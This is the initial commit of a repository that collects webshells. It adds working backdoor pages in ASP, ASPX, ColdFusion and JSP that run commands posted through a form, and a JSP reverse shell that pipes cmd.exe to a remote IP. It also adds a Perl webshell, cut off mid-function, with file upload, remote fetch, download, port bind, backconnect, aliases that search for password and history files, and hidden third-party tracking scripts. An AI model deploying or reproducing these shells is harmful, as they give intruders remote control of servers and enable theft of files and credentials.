Initial commit

README.md

@@ -0,0 +1 @@
+Various webshells. Please send add more via pull requests. :)

asp/cmd-asp-5.1.asp

@@ -0,0 +1,41 @@
+<%
+
+' ASP Cmd Shell On IIS 5.1
+' brett.moore_at_security-assessment.com 
+' http://seclists.org/bugtraq/2006/Dec/0226.html
+
+
+Dim oS,oSNet,oFSys, oF,szCMD, szTF
+On Error Resume Next
+Set oS = Server.CreateObject("WSCRIPT.SHELL")
+Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form("C")
+If (szCMD <> "") Then
+  szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" &  oFSys.GetTempName()
+  ' Here we do the command
+  Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
+"""",0,True)
+  response.write szTF
+  ' Change perms
+  Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
+everyone:F",0,True)
+  Set oF = oFSys.OpenTextFile(szTF,1,False,0)
+End If 
+%>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name="C" size=70 value="<%= szCMD %>">
+<input type=submit value="Run"></FORM><PRE>
+Machine: <%=oSNet.ComputerName%><BR>
+Username: <%=oSNet.UserName%><br>
+<% 
+If (IsObject(oF)) Then
+  On Error Resume Next
+  Response.Write Server.HTMLEncode(oF.ReadAll)
+  oF.Close
+  Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
+End If 
+
+%>
+
+<!--    http://michaeldaw.org   2006    -->

asp/cmdasp.asp

@@ -0,0 +1,55 @@
+<%@ Language=VBScript %>
+<%
+  ' --------------------o0o--------------------
+  '  File:    CmdAsp.asp
+  '  Author:  Maceo <maceo @ dogmile.com>
+  '  Release: 2000-12-01
+  '  OS:      Windows 2000, 4.0 NT
+  ' -------------------------------------------
+
+  Dim oScript
+  Dim oScriptNet
+  Dim oFileSys, oFile
+  Dim szCMD, szTempFile
+
+  On Error Resume Next
+
+  ' -- create the COM objects that we will be using -- '
+  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+  ' -- check for a command that we have posted -- '
+  szCMD = Request.Form(".CMD")
+  If (szCMD <> "") Then
+
+    ' -- Use a poor man's pipe ... a temp file -- '
+    szTempFile = "C:\" & oFileSys.GetTempName( )
+    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+
+  End If
+
+%>
+<HTML>
+<BODY>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name=".CMD" size=45 value="<%= szCMD %>">
+<input type=submit value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+  If (IsObject(oFile)) Then
+    ' -- Read the output from our command and remove the temp file -- '
+    On Error Resume Next
+    Response.Write Server.HTMLEncode(oFile.ReadAll)
+    oFile.Close
+    Call oFileSys.DeleteFile(szTempFile, True)
+  End If
+%>
+</BODY>
+</HTML>
+
+<!--    http://michaeldaw.org   2006    -->

aspx/cmdasp.aspx

@@ -0,0 +1,42 @@
+<%@ Page Language="C#" Debug="true" Trace="false" %>
+<%@ Import Namespace="System.Diagnostics" %>
+<%@ Import Namespace="System.IO" %>
+<script Language="c#" runat="server">
+void Page_Load(object sender, EventArgs e)
+{
+}
+string ExcuteCmd(string arg)
+{
+ProcessStartInfo psi = new ProcessStartInfo();
+psi.FileName = "cmd.exe";
+psi.Arguments = "/c "+arg;
+psi.RedirectStandardOutput = true;
+psi.UseShellExecute = false;
+Process p = Process.Start(psi);
+StreamReader stmrdr = p.StandardOutput;
+string s = stmrdr.ReadToEnd();
+stmrdr.Close();
+return s;
+}
+void cmdExe_Click(object sender, System.EventArgs e)
+{
+Response.Write("<pre>");
+Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
+Response.Write("</pre>");
+}
+</script>
+<HTML>
+<HEAD>
+<title>awen asp.net webshell</title>
+</HEAD>
+<body >
+<form id="cmd" method="post" runat="server">
+<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
+<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
+<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
+</form>
+</body>
+</HTML>
+
+<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
+<!--    http://michaeldaw.org   04/2007    -->

cfm/cfexec.cfm

@@ -0,0 +1,43 @@
+<html>
+<body>
+
+<!-- Contributed by Kurt Grutzmacher () -->
+
+Notes:<br><br>
+<ul>
+<li>Prefix DOS commands with "c:\windows\system32\cmd.exe /c &lt;command&gt;" or wherever cmd.exe is<br>
+<li>Options are, of course, the command line options you want to run
+<li>CFEXECUTE could be removed by the admin. If you have access to CFIDE/administrator you can re-enable it
+</ul>
+<p>
+<cfoutput>
+<table>
+<form method="POST" action="cfexec.cfm">
+<tr><td>Command:</td><td><input type=text name="cmd" size=50 
+  <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
+<tr><td>Options:</td><td> <input type=text name="opts" size=50 
+  <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
+<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4 
+  <cfif isdefined("form.timeout")>value="#form.timeout#"
+  <cfelse>value="5"</cfif>></td></tr>
+</table>
+<input type=submit value="Exec" >
+</FORM>
+
+<cfif isdefined("form.cmd")>
+<cfsavecontent variable="myVar">
+<cfexecute name = "#Form.cmd#"
+   arguments = "#Form.opts#" 
+   timeout = "#Form.timeout#">
+</cfexecute>
+</cfsavecontent>
+<pre>
+#myVar#
+</pre>
+</cfif>
+</cfoutput>
+</body>
+</html>
+
+<!-- Contributed by Kurt Grutzmacher (http://grutz.jingojango.net/exploits/) -->
+<!--    http://michaeldaw.org   04/2007    -->

jsp/cmdjsp.jsp

@@ -0,0 +1,32 @@
+// note that linux = cmd and windows = "cmd.exe /c + cmd" 
+
+<FORM METHOD=GET ACTION='cmdjsp.jsp'>
+<INPUT name='cmd' type=text>
+<INPUT type=submit value='Run'>
+</FORM>
+
+<%@ page import="java.io.*" %>
+<%
+   String cmd = request.getParameter("cmd");
+   String output = "";
+
+   if(cmd != null) {
+      String s = null;
+      try {
+         Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
+         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
+         while((s = sI.readLine()) != null) {
+            output += s;
+         }
+      }
+      catch(IOException e) {
+         e.printStackTrace();
+      }
+   }
+%>
+
+<pre>
+<%=output %>
+</pre>
+
+<!--    http://michaeldaw.org   2006    -->

jsp/jsp-reverse.jsp

@@ -0,0 +1,91 @@
+// backdoor.jsp
+// http://www.security.org.sg/code/jspreverse.html
+
+<%@
+page import="java.lang.*, java.util.*, java.io.*, java.net.*"
+% >
+<%!
+static class StreamConnector extends Thread
+{
+        InputStream is;
+        OutputStream os;
+
+        StreamConnector(InputStream is, OutputStream os)
+        {
+                this.is = is;
+                this.os = os;
+        }
+
+        public void run()
+        {
+                BufferedReader isr = null;
+                BufferedWriter osw = null;
+
+                try
+                {
+                        isr = new BufferedReader(new InputStreamReader(is));
+                        osw = new BufferedWriter(new OutputStreamWriter(os));
+
+                        char buffer[] = new char[8192];
+                        int lenRead;
+
+                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
+                        {
+                                osw.write(buffer, 0, lenRead);
+                                osw.flush();
+                        }
+                }
+                catch (Exception ioe)
+
+                try
+                {
+                        if(isr != null) isr.close();
+                        if(osw != null) osw.close();
+                }
+                catch (Exception ioe)
+        }
+}
+%>
+
+<h1>JSP Backdoor Reverse Shell</h1>
+
+<form method="post">
+IP Address
+<input type="text" name="ipaddress" size=30>
+Port
+<input type="text" name="port" size=10>
+<input type="submit" name="Connect" value="Connect">
+</form>
+<p>
+<hr>
+
+<%
+String ipAddress = request.getParameter("ipaddress");
+String ipPort = request.getParameter("port");
+
+if(ipAddress != null && ipPort != null)
+{
+        Socket sock = null;
+        try
+        {
+                sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
+
+                Runtime rt = Runtime.getRuntime();
+                Process proc = rt.exec("cmd.exe");
+
+                StreamConnector outputConnector =
+                        new StreamConnector(proc.getInputStream(),
+                                          sock.getOutputStream());
+
+                StreamConnector inputConnector =
+                        new StreamConnector(sock.getInputStream(),
+                                          proc.getOutputStream());
+
+                outputConnector.start();
+                inputConnector.start();
+        }
+        catch(Exception e) 
+}
+%>
+
+<!--    http://michaeldaw.org   2006    -->

perl/Perl Web Shell by RST-GHC.pl

@@ -0,0 +1,663 @@
+#!/usr/bin/perl
+
+## pws.pl - Perl Web Shell by RST/GHC
+## -------------------------------------
+## ??????? ???????:
+## ~~~~~~~~~~~~~~~~
+## - ?????????? ???????????? ?????? ?? ??????? (+ ?????? ??????)
+## - ???????? ?????? ?? ?????? ? ?????????? ?????????? ????????????
+## - ???????? ?????? ?? ?????? ? ?????????? ???????
+## - ?????????? ???????????? ?????? ? ???????
+## - ???????? ? ?????????????? ?????? ?? ???????
+## - port bind
+## - backconnect
+##
+## ??????????? ???????:
+## ~~~~~~~~~~~~~~~~~~~~
+## - ???????? ??? ?? unix ??? ? ?? windows ??????????
+## - ??? ?????? ???????? ????? POST ???????
+##
+## ?????????:
+## ~~~~~~~~~~
+## 1. ???????? ?????? ????? ??????? "/usr/bin/perl" ?? ?????????? ???? ? ?????????????? ????? 
+##    ?? ????? ???????.
+## 2. ?????????? ?????? ??? ??????? ? ??????? ? ?????? ???????? (?????? CONFIG).
+## 3. ? ?????? ???? ?????? ???????? ??? ??????????? WINDOWS ?? ?????????? $unix = 0 ? ??????
+##    ???????? ??????? (?????? CONFIG).
+## 4. ????????? ???? ?? ?????? ? ????? ??????????? ?????? cgi-????????, ?????? cgi-bin.
+##    ???????? ?????? ???????????? ? ASCII ??????.
+## 5. ??????? ????? ?? ?????? (chmod 755).
+## 6. ???????? ?????? ? ???????? ? ?????????????.
+## -------------------------------------
+## (c)oded by 1dt.w0lf
+## RST/GHC
+## Astalavista-UnderGround!!!
+## 
+use IO::Socket;
+
+############### CONFIG
+$auth = 1;         # ??????????? (1 - ????????, 0 - ?????????)
+$password = 'r57'; # ?????? ??? ??????? ? ???????
+$unix = 1;         # ??? WINDOWS ??????? ?? $unix = 0
+# ?????? ?????? ?? ??????? ? ???????, ???? ?? ??????? ? ???, ??? ???????.
+$version = '1.0 (13.05.2005)';
+$pwd = ($unix)?('pwd'):('cd');          
+$cmd_sep = '&&';                        
+$def_cmd = ($unix)?('ls -la'):('dir');
+$path_sep = ($unix)?('/'):('\\');  
+$error = 0;
+############### TEXT
+@lang = (
+'<b><font color=red>?????????? ?????? ?? ???????</font></b><br>',
+'<b>???????:</b>',
+'<b>??????????:</b>',
+'<b><font color=red>?????? ??????</font></b><br>',
+'<b>?????:</b>',
+'?????????',
+'<b>??????????? ???????:</b>',
+'  ???????  ',
+'<b><font color=red>???????? ????? ? ?????????? ??????????</font></b><br>',
+'<b>????:</b>',
+'?????????',
+'<b><font color=red>???????? ????? c ?????????? ???????</font></b><br>',
+'<b><font color=red>????????/?????????????? ?????</font></b><br>',
+'????????',
+'<b>?????????????? ?????:</b>',
+'<b>???????? ?????:</b>',
+'?????????',
+'<b><font color=red>?????????? ?????</font></b><br>',
+' ??????? ',
+'<b><font color=red>Bind port</font></b><br>',
+'<b>Port:</b>',
+'BIND',
+'<b><font color=red>Backconnect</font></b><br>',
+'<b>IP:</b>',
+'CONNECT',
+'<b><font color=red>??????? ??????</font></b><br>',
+'?????'
+);
+############### HTML
+$d1 = '<div align=center>';
+$d2 = '</div>';
+$t1 = '<table width=100%>';
+$t2 = '</table>';
+$td1 = '<td width=50%>';
+$f = '</form>';
+$tr1 = '<tr><td>';
+$tr2 = '</td></tr>';
+$j1  = q{[ <font face=tahoma>2005 (c) <b>RST/GHC</b> <a href="http://rst.void.ru" target=_blank>http://rst.void.ru</a> , <a href="http://ghc.ru" target=_blank>http://ghc.ru</a></font> ]};
+$j2  = q{<script language="javascript">hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+escape(window.location.href);document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");</script>
+<script language="javascript1.1">hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script><script language="javascript1.2">hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen.pixelDepth)</script>
+<script language="javascript1.3">hotlog_js="1.3"</script><script language="javascript">hotlog_r+="&js="+hotlog_js;document.write("<a href='http://click.hotlog.ru/?81606' target='_top'><img "+" src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+hotlog_r+"&' border=0 width=1 height=1 alt=1></a>")</script>
+<noscript><a href=http://click.hotlog.ru/?81606 target=_top><imgsrc="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" border=0 width="0" height="0" alt=""></a></noscript>
+<!--LiveInternet counter--><script language="JavaScript"><!--
+document.write('<a href="http://www.liveinternet.ru/click" '+
+'target=_blank><img src="http://counter.yadro.ru/hit?t52.6;r'+
+escape(document.referrer)+((typeof(screen)=='undefined')?'':
+';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
+screen.colorDepth:screen.pixelDepth))+';'+Math.random()+
+'" alt="" '+'border=0 width=0 height=0></a>')//--></script>
+<!--/LiveInternet-->};
+############### ALIASES
+%alias = (
+'find suid files' => 'find / -type f -perm -04000 -ls',
+'find suid files in current dir' => 'find . -type f -perm -04000 -ls',
+'find sgid files' => 'find / -type f -perm -02000 -ls',
+'find sgid files in current dir' => 'find . -type f -perm -02000 -ls',
+'find config.inc.php files' => 'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir' => 'find . -type f -name config.inc.php',
+'find config* files' => 'find / -type f -name "config*"',
+'find config* files in current dir' => 'find . -type f -name "config*"',
+'find all writable files' => 'find / -type f -perm -2 -ls',
+'find all writable files in current dir' => 'find . -type f -perm -2 -ls',
+'find all writable directories' => 'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir' => 'find . -type d -perm -2 -ls',
+'find all writable directories and files' => 'find / -perm -2 -ls',
+'find all writable directories and files in current dir' => 'find . -perm -2 -ls',
+'find all service.pwd files' => 'find / -type f -name service.pwd',
+'find service.pwd files in current dir' => 'find . -type f -name service.pwd',
+'find all .htpasswd files' => 'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd',
+'find all .bash_history files' => 'find / -type f -name .bash_history',
+'find .bash_history files in current dir' => 'find . -type f -name .bash_history',
+'find all .fetchmailrc files' => 'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc',
+'list file attributes' => 'lsattr -va',
+'show opened ports' => 'netstat -an | grep -i listen'
+);
+############### GET INFO
+($script_name = $ENV{'SCRIPT_NAME'}) =~ s!(?:.*)(?:/)([^/]*)!$1!;
+($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)?(&get_file($1)):(&get_val());
+############### AUTH
+if($auth)
+ {
+ &cook();
+ if($FORM{PASS} eq $password) { print "Set-Cookie: PASS=".cry($FORM{PASS}).";\nContent-type: text/html\n\n<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$script_name\">"; exit(); }
+ if(!$COOK{PASS}||($COOK{PASS} ne cry($password))) { &form_login; exit(); } 
+ }
+############### ACTIONS 
+$cur_dir = `$pwd`;
+if(defined$FORM{DIR}) { $cur_dir = $FORM{DIR}; }
+chomp($cur_dir);
+
+if(!defined$FORM{ACTION}) { $FORM{ACTION} = 'CMD'; }
+ 
+if($FORM{ACTION} eq 'ALIAS'){ $FORM{CMD} = $alias{$FORM{ALIAS}}; }
+
+elsif($FORM{ACTION} eq 'UPLOAD')
+ { 
+  $filename = $cur_dir;
+  chop($filename) if ($filename =~ m/[\\\/]$/);
+  $FILE{f} =~ s!(?:.*)(?:[\\/])([^/\\]*)$!$1!;
+  $filename .= $path_sep;
+  $filename .= $FILE{f};
+  if(open(UF, ">$filename"))
+   {
+    binmode(UF) if !$unix;
+    print UF $FILE{filedata};
+    close(UF);
+   }
+  else { $error = "??????! ?? ???? ??????? ???? <font color=black>$filename</font>"; }
+  }
+
+elsif($FORM{ACTION} eq 'RUPLOAD')
+ {
+ if($FORM{FILE} =~ m!^(?:http:\/\/)([^\/]*)(\/.*)$!)
+  {
+  $server = $1;
+  $path   = $2;
+  $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
+  if($sock)
+   {
+   print $sock "GET $path HTTP/1.0\nHost: $server\n\n";
+   $r = 0; $a = 0;
+   foreach $l(<$sock>)
+    {
+    if($l =~ /200 OK/) { $a = 200; }
+    push(@rf,$l) if $r;
+    if($l =~ /^\s$/ && $a == 200) { $r = 1; }
+    }
+   if($a != 200) { $error = "??????! ???? <font color=black>$path</font> ?? ?????? ?? ??????? <font color=black>$server</font>"; }
+   }
+  else { $error = "??????! ?? ???? ??????????? ? <font color=black>$server</font>"; }
+  if(!$error)
+   {
+   $filename = $cur_dir;
+   chop($filename) if ($filename =~ m/[\\\/]$/);
+   $path =~ s!(?:.*)(?:[\\/])([^/\\]*)$!$1!;
+   $filename .= $path_sep;
+   $filename .= $path;
+   if(open(WF,">$filename"))
+    {
+    binmode(WF) if !$unix;
+    foreach(@rf) { print WF $_; }
+    close(WF);
+    }
+   else { $error = "??????! ?? ???? ??????? ???? <font color=black>$filename</font>"; }
+   }
+  }
+ }
+elsif($FORM{ACTION} eq 'VIEW')
+ {
+ if(open(VF,">>",$FORM{EFILE})) { $readonly = 0; close(VF);}
+ elsif(open(VF,$FORM{EFILE})) { $readonly = 1; close(VF);}
+ else { $error = "??????! ?? ???? ??????? ???? <font color=black>$FORM{EFILE}</font>"; }
+ if(!$error)
+  {
+  open(VF,$FORM{EFILE});
+  while(<VF>) { push(@cmd_report,$_); }
+  close(VF);
+  }
+ }
+elsif($FORM{ACTION} eq 'SAVE')
+ {
+ if(open(SF,">",$FORM{SFILE}))
+  {
+   binmode(SF) if !$unix;
+   foreach(@FORM{REPORT}) { print SF $_; }
+   close(SF);
+  }
+ else { $error = "??????! ?? ???? ????????? ???? <font color=black>$FORM{SFILE}</font>"; }
+ }
+elsif($FORM{ACTION} eq 'DOWNLOAD')
+ {
+ if(open(DF,$FORM{DFILE}))
+  {
+   if(!$unix) { binmode(DF); binmode(STDOUT); }
+   $size = (stat($FORM{DFILE}))[7];
+   ($filename = $FORM{DFILE}) =~  m!([^/^\\]*)$!;
+   print "Content-Type: application/x-unknown\n";
+   print "Content-Length: $size\n";
+   print "Content-Disposition: attachment; filename=$filename\n\n";
+   print while(<DF>);
+   close(DF);
+   die();
+  }
+  else { $error = "??????! ?? ???? ??????? ???? <font color=black>$FORM{DFILE}</font>"; }
+ }
+elsif($FORM{ACTION} eq 'BIND')
+ {
+ print "Content-type: text/html\n\n";
+ &link();
+ &port_bind($FORM{PORT});
+ exit;
+ }
+elsif($FORM{ACTION} eq 'BACK')
+ {
+ print "Content-type: text/html\n\n";
+ &link();
+ &back($FORM{IP},$FORM{PORT});
+ exit;
+ }
+ 
+   
+if(!defined$FORM{CMD}){ $FORM{CMD} = $def_cmd; }
+
+if(($FORM{ACTION} ne 'VIEW')||$error){
+open(FH, "cd $cur_dir$cmd_sep$FORM{CMD}|");
+@cmd_report = <FH>;
+close (FH);
+}
+############### START HTML
+print "Content-type: text/html\n\n";
+print qq{<HTML><HEAD>
+<title>$script_name - Perl Web Shell by RST/GHC</title>
+<META http-equiv=Content-Type Pragma: no-cache; content=\"text/html; charset=windows-1251\">
+<style>
+
+BODY
+{
+SCROLLBAR-FACE-COLOR: white;
+SCROLLBAR-HIGHLIGHT-COLOR: black;
+SCROLLBAR-SHADOW-COLOR: black;
+SCROLLBAR-DARKSHADOW-COLOR: black;
+SCROLLBAR-3DLIGHT-COLOR: black;
+SCROLLBAR-ARROW-COLOR: black;
+SCROLLBAR-TRACK-COLOR: white;
+}
+
+tr {
+BORDER-RIGHT:  #000000 1px solid;
+BORDER-TOP:    #000000 1px solid;
+BORDER-LEFT:   #000000 1px solid;
+BORDER-BOTTOM: #000000 1px solid;
+font: 8pt Verdana;
+}
+
+td {
+BORDER-RIGHT:  #000000 1px solid;
+BORDER-TOP:    #000000 1px solid;
+BORDER-LEFT:   #000000 1px solid;
+BORDER-BOTTOM: #000000 1px solid;
+font: 8pt Verdana;
+}
+
+table {
+BORDER-RIGHT:  #000000 0px solid;
+BORDER-TOP:    #000000 0px solid;
+BORDER-LEFT:   #000000 0px solid;
+BORDER-BOTTOM: #000000 0px solid;
+BACKGROUND-COLOR: #FFFFFF;
+font: 8pt Verdana;
+}
+
+input {
+BORDER-RIGHT:  #000000 1px solid;
+BORDER-TOP:    #000000 1px solid;
+BORDER-LEFT:   #000000 1px solid;
+BORDER-BOTTOM: #000000 1px solid;
+BACKGROUND-COLOR: #FFFFFF;
+font: 8pt Verdana;
+}
+
+select {
+BORDER-RIGHT:  #000000 1px solid;
+BORDER-TOP:    #000000 1px solid;
+BORDER-LEFT:   #000000 1px solid;
+BORDER-BOTTOM: #000000 1px solid;
+BACKGROUND-COLOR: #FFFFFF;
+font: 8pt Verdana;
+}
+
+submit {
+BORDER-RIGHT:  buttonhighlight 1px solid;
+BORDER-TOP:    buttonhighlight 1px solid;
+BORDER-LEFT:   buttonhighlight 1px solid;
+BORDER-BOTTOM: buttonhighlight 1px solid;
+BACKGROUND-COLOR: #FFFFFF;
+width: 30%;
+}
+
+textarea {
+BORDER-RIGHT:  #000000 1px solid;
+BORDER-TOP:    #000000 1px solid;
+BORDER-LEFT:   #000000 1px solid;
+BORDER-BOTTOM: #000000 1px solid;
+BACKGROUND-COLOR: #FFFFFF;
+font: Fixedsys bold;
+}
+
+a: { text-decoration: none }
+a:link { text-decoration: none}
+a:hover { text-decoration: none; color: red}
+a:active {  text-decoration: none}
+a:visited {  text-decoration: none}
+
+</style>
+</HEAD>
+<body bgcolor="#FFFFFF" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" link="#000000" vlink="#000000" alink="#000000">
+$d1
+};
+if(length($j2)!=1471) { die(); }
+# start table
+print qq{$t1$tr1&nbsp;<font face=Webdings size=6><b>!</b></font>&nbsp;&nbsp;<b><font face=tahoma>r57pws - Perl Web Shell by RST/GHC version $version</font></b>$tr2};
+
+# cmd report form
+print "$tr1$d1<font color=red><b>$error</b>$d2</font>$tr2" if $error;
+print "$tr1&nbsp;";
+if(($FORM{ACTION} ne 'VIEW')||$error)
+ {
+ &l(6);
+ ($p_cmd = $FORM{CMD}) =~ s/(^.{90})(?:.+)/$1 .../;
+ print "&nbsp;<font color=blue><b>$p_cmd</b></font>$tr2";
+ }
+else
+ {
+ (!$readonly)?(&l(14)):(&l(15));
+ print "&nbsp;<font color=blue><b>$FORM{EFILE}</b></font>$tr2";
+ if(!$readonly){ &form(0); }
+ } 
+print "$tr1$d1<textarea name=REPORT cols=121 rows=15>";
+foreach(@cmd_report){ print $_; }
+print "</textarea>";
+if(($FORM{ACTION} eq 'VIEW') && !$error &&!$readonly)
+ { 
+ print "<BR>"; 
+ &input('submit','submit',$lang[16],undef,undef); 
+ &input('hidden','ACTION','SAVE',undef,undef);
+ &input('hidden','DIR',$cur_dir,undef,undef);
+ &input('hidden','SFILE',$FORM{EFILE},undef,undef);
+ }
+print "$d2$tr2";
+if(($FORM{ACTION} eq 'VIEW') && !$error &&!$readonly){ print $f; }
+
+# change dir form
+&form(0);
+print "$t1$tr1&nbsp;";
+&l(2);
+print "&nbsp;";
+&input('text','DIR',$cur_dir,129,'&nbsp;');
+&input('submit','submit',$lang[7],undef,undef);
+&input('hidden','ACTION','CD',undef,undef);
+print $tr2,$f,$t2;
+
+print "$t2$d1$t1";
+
+# cmd form
+&form(0);
+print "<tr>$td1$d1";
+&l(0);
+&l(1);
+print "&nbsp;";
+&input('text','CMD',$FORM{CMD},45,'&nbsp;');
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','CMD',undef,undef);
+&input('submit','submit',$lang[5],undef,undef);
+print "$d2</td>$f";
+
+# alias form
+&form(0);
+print $td1,$d1;
+&l(3);
+print "&nbsp;";
+&l(4);
+print "&nbsp;";
+print "<select name=ALIAS>";
+while( ($key,$value) = each %alias )
+ {
+ print "<option>$key</option>";
+ }
+print "</select>&nbsp;";
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','ALIAS',undef,undef);
+&input('submit','submit',$lang[5],undef,undef);
+print $d2,$tr2,$f;
+
+# file upload form
+&form(1);
+print "<tr>$td1$d1";
+&l(8);
+print "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+&l(9);
+print "&nbsp;";
+&input('file','FILE','',35,undef);
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','UPLOAD',undef,'&nbsp;&nbsp;');
+&input('submit','submit',$lang[10],undef,undef);
+print "$d2</td>$f";
+
+# upload from remote host
+&form(0);
+print $td1,$d1;
+&l(11);
+print "&nbsp;";
+&l(9);
+print '&nbsp;';
+&input('text','FILE','http://server.com/file.txt',49,undef);
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','RUPLOAD',undef,'&nbsp');
+&input('submit','submit',$lang[10],undef,undef);
+print $d2,$tr2,$f;
+
+# view/edit file form
+&form(0);
+print "<tr>$td1$d1";
+&l(12);
+print "&nbsp;&nbsp;&nbsp;";
+&l(9);
+print "&nbsp;";
+&input('text','EFILE',$cur_dir,45,'&nbsp;');
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','VIEW',undef,undef);
+&input('submit','submit',$lang[13],undef,undef);
+print "$d2</td>$f";
+
+# download file
+&form(0);
+print $td1,$d1;
+&l(17);
+print "&nbsp;";
+&l(9);
+print "&nbsp;";
+&input('text','DFILE',$cur_dir,49,'&nbsp;');
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','DOWNLOAD',undef,undef);
+&input('submit','submit',$lang[18],undef,undef);
+print $d2,$tr2,$f;
+
+# port bind form
+&form(0);
+print "<tr>$td1$d1";
+&l(19);
+&l(20);
+print "&nbsp;";
+&input('text','PORT','11457',15,'&nbsp;');
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','BIND',undef,undef);
+&input('submit','submit',$lang[21],undef,undef);
+print "$d2</td>$f";
+
+# backconnect form
+&form(0);
+print $td1,$d1;
+&l(22);
+print "&nbsp;";
+&l(23);
+print "&nbsp;";
+&input('text','IP',$ENV{REMOTE_ADDR},15,'&nbsp;');
+&l(20);
+print "&nbsp;";
+&input('text','PORT','11457',15,'&nbsp;');
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','BACK',undef,undef);
+&input('submit','submit',$lang[24],undef,undef);
+print $d2,$tr2,$f;
+
+# end table
+print qq{$t2$d2};
+# (c) + stats
+print qq{$t1$tr1$d1$j1$d2$tr2$t2};
+############### END HTML
+print qq{$j2$d2</BODY></HTML>};
+############### GET VALUES
+sub get_val() 
+ {
+  sysread(STDIN,$query,$ENV{'CONTENT_LENGTH'});
+  @formfields = split(/&/,$query);
+  foreach(@formfields)
+   {
+    ($f_n,$f_v) = split(/=/,$_);
+    $f_n = &urldecode($f_n);
+    $f_v = &urldecode($f_v);
+    $FORM{$f_n} = $f_v;
+   }
+ }
+############### GET FILE
+sub get_file()
+ {
+ binmode(STDIN) if !$unix;
+ sysread(STDIN, $query, $ENV{'CONTENT_LENGTH'});
+ $boundary = '--'.@_[0];
+ @formfields = split(/$boundary/, $query); 
+ $headerbody = $formfields[1];
+ $headerbody =~ /\r\n\r\n|\n\n/;
+ $header = $`;
+ $body = $';
+ $body =~ s/\r\n$//;
+ $FILE{filedata} = $body;
+ $header =~ /filename=\"(.+)\"/; 
+ $FILE{f} = $1; 
+ $FILE{f} =~ s/\"//g;
+ $FILE{f} =~ s/\s//g;
+ for($i=2; $formfields[$i]; $i++)
+ {  
+  $formfields[$i] =~ s/^.+name=$//; 
+  $formfields[$i] =~ /\"(\w+)\"/; 
+  $f_n = $1; 
+  $f_v = $'; 
+  $f_v =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g; 
+  $f_v = &urldecode($f_v);
+  $FORM{$f_n} = $f_v; 
+ }
+ }
+############### URLDECODE
+sub urldecode()
+ {
+  local($val) = @_;
+  $val =~ s/\+/ /g;
+  $val =~ s/%([0-9a-hA-H]{2})/pack('C',hex($1))/ge;
+  return $val;
+ }
+############### INPUT
+sub input()
+ {
+ $return  = "<input type=@_[0] name=@_[1] value=\"@_[2]\"";
+ $return .= " size=@_[3]" if defined@_[3];
+ $return .= ">";
+ $return .= "@_[4]" if defined @_[4];
+ print $return;
+ }
+############### FORM
+sub form()
+ {
+ $return  = '<form name=form method=post';
+ $return .= ' enctype=multipart/form-data' if @_[0]; 
+ $return .= '>';
+ print $return;
+ }
+############### LANG
+sub l()
